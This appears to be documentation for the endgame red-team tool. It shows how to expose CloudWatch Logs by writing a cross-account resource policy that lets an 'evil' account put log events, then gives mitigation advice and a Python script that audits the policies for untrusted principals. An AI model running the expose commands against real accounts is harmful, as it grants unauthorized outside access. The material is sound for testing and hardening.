CloudWatch Logs resource policies allow other AWS services or IAM principals, including principals in other AWS accounts, to put log events into log groups in this account.
- To expose the resource using endgame, run the following from the victim account:

```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service cloudwatch --name test-resource-exposure
```
- To view the contents of the exposed resource policy, run the following:

```bash
aws logs describe-resource-policies
```
- Observe that the contents of the exposed resource policy match the example shown below. Note that the principal written into the policy is the root of the evil account rather than `user/evil` itself, so any IAM principal in account 999988887777 whose own identity policy allows the listed `logs:` actions can now write log events into the victim account.

```json
{
    "resourcePolicies": [
        {
            "policyName": "test-resource-exposure",
            "policyDocument": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Sid\":\"\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::999988887777:root\"},\"Action\":[\"logs:PutLogEventsBatch\",\"logs:PutLogEvents\",\"logs:CreateLogStream\"],\"Resource\":\"arn:aws:logs:*\"}]}",
            "lastUpdatedTime": 1613244111319
        }
    ]
}
```
TODO
‼️ Note: At the time of this writing, AWS Access Analyzer does NOT support auditing of this resource type to prevent resource exposure. We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool. 😊
- Trusted Accounts Only: Ensure that CloudWatch Logs access is only shared with trusted accounts, and that the trusted accounts truly need access to write to the CloudWatch Logs.
- Ensure access is necessary: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
- Restrict access to IAM permissions that could lead to exposing write access to your CloudWatch Logs: tightly control which principals are allowed the following IAM actions:
- logs:PutResourcePolicy: Creates or updates a resource policy allowing other AWS services to put log events to this account
- logs:DeleteResourcePolicy: Deletes a resource policy from this account. This revokes the access of the identities in that policy to put log events to this account.
- logs:DescribeResourcePolicies: Lists the resource policies in this account.
Also, consider using Cloudsplaining to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report here
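Because Access Analyzer does not cover this resource type, the "trusted accounts only" check above has to be done by hand. The following script is an added example, not part of endgame or of this page: it parses the JSON that `aws logs describe-resource-policies` returns, walks every `Allow` statement, and reports each AWS principal that is a wildcard, unparseable, or belongs to an account outside your own account and an allow-list of trusted accounts. The sample input is constructed here: it contains the policy endgame wrote above plus two hypothetical policies (`route53-query-logging`, a service-principal grant that is not a cross-account exposure, and `public-write`, a `Principal: "*"` grant). The own account ID `111122223333` and the script name `audit_logs_policies.py` are assumptions.

```python
import json
import re
import sys

# Constructed sample input, shaped like `aws logs describe-resource-policies` output.
# Entry 1 is the policy endgame wrote above; entries 2 and 3 are hypothetical.
SAMPLE_RESPONSE = {
    "resourcePolicies": [
        {
            "policyName": "test-resource-exposure",
            "policyDocument": json.dumps({"Version": "2012-10-17", "Statement": [{
                "Sid": "", "Effect": "Allow",
                "Principal": {"AWS": "arn:aws:iam::999988887777:root"},
                "Action": ["logs:PutLogEventsBatch", "logs:PutLogEvents", "logs:CreateLogStream"],
                "Resource": "arn:aws:logs:*"}]}),
            "lastUpdatedTime": 1613244111319,
        },
        {
            "policyName": "route53-query-logging",  # hypothetical: a service principal, not another account
            "policyDocument": json.dumps({"Version": "2012-10-17", "Statement": [{
                "Effect": "Allow",
                "Principal": {"Service": "route53.amazonaws.com"},
                "Action": ["logs:CreateLogStream", "logs:PutLogEvents"],
                "Resource": "arn:aws:logs:us-east-1:111122223333:log-group:/aws/route53/*"}]}),
            "lastUpdatedTime": 1613244111320,
        },
        {
            "policyName": "public-write",  # hypothetical: grants everyone write access
            "policyDocument": json.dumps({"Version": "2012-10-17", "Statement": [{
                "Effect": "Allow", "Principal": "*",
                "Action": "logs:PutLogEvents", "Resource": "arn:aws:logs:*"}]}),
            "lastUpdatedTime": 1613244111321,
        },
    ]
}

ACCOUNT_ID_RE = re.compile(r"\d{12}")
# IAM and STS ARNs carry the account ID in the fifth colon-separated field.
ARN_RE = re.compile(r"^arn:aws[\w-]*:(?:iam|sts)::(\d{12}):")


def principal_entries(principal):
    """Yield (kind, value) pairs for every entry in a statement's Principal field.
    Handles the bare "*" form, {"AWS": "<arn>"}, {"AWS": [...]} and the
    Service / Federated / CanonicalUser forms."""
    if principal == "*":
        yield ("AWS", "*")
        return
    for kind, values in principal.items():
        for value in ([values] if isinstance(values, str) else values):
            yield (kind, value)


def account_of(aws_principal):
    """Return the 12-digit account ID behind an AWS principal, "*" for a
    wildcard, or None if it is neither an account ID nor an IAM/STS ARN
    (e.g. the unique ID AWS substitutes for a deleted principal)."""
    if aws_principal == "*":
        return "*"
    if ACCOUNT_ID_RE.fullmatch(aws_principal):
        return aws_principal
    match = ARN_RE.match(aws_principal)
    return match.group(1) if match else None


def find_untrusted_grants(response, own_account, trusted_accounts=()):
    """Return [(policyName, principal)] for every Allow statement whose AWS
    principal is a wildcard, unparseable, or an account outside own_account
    and trusted_accounts. Service principals are skipped because they are not
    another account. Conditions are deliberately not evaluated: a conditioned
    grant to an untrusted account is still reported, which is the conservative choice."""
    allowed = {own_account, *trusted_accounts}
    findings = []
    for policy in response.get("resourcePolicies", []):
        statements = json.loads(policy["policyDocument"]).get("Statement", [])
        if isinstance(statements, dict):  # a single statement may be written without a list
            statements = [statements]
        for stmt in statements:
            if stmt.get("Effect") != "Allow" or "Principal" not in stmt:
                continue
            for kind, value in principal_entries(stmt["Principal"]):
                if kind != "AWS":
                    continue
                account = account_of(value)
                if account == "*" or account is None or account not in allowed:
                    findings.append((policy["policyName"], value))
    return findings


if __name__ == "__main__":
    # Usage: aws logs describe-resource-policies | python3 audit_logs_policies.py 111122223333 [trusted-account ...]
    # With nothing piped in, the constructed sample above is audited instead.
    own = sys.argv[1] if len(sys.argv) > 1 else "111122223333"  # hypothetical own account
    response = SAMPLE_RESPONSE if sys.stdin.isatty() else json.load(sys.stdin)
    hits = find_untrusted_grants(response, own, sys.argv[2:])
    for name, principal in hits:
        print(f"UNTRUSTED: policy {name!r} grants log write access to {principal}")
    sys.exit(1 if hits else 0)
```

Run against the sample with `111122223333` as the own account and no trusted accounts, it reports the endgame policy (root of 999988887777) and the `public-write` wildcard, and ignores the Route 53 service principal; adding `999988887777` to the trusted list silences the first finding only. Once a finding is confirmed unwanted, `aws logs delete-resource-policy --policy-name test-resource-exposure` removes the grant.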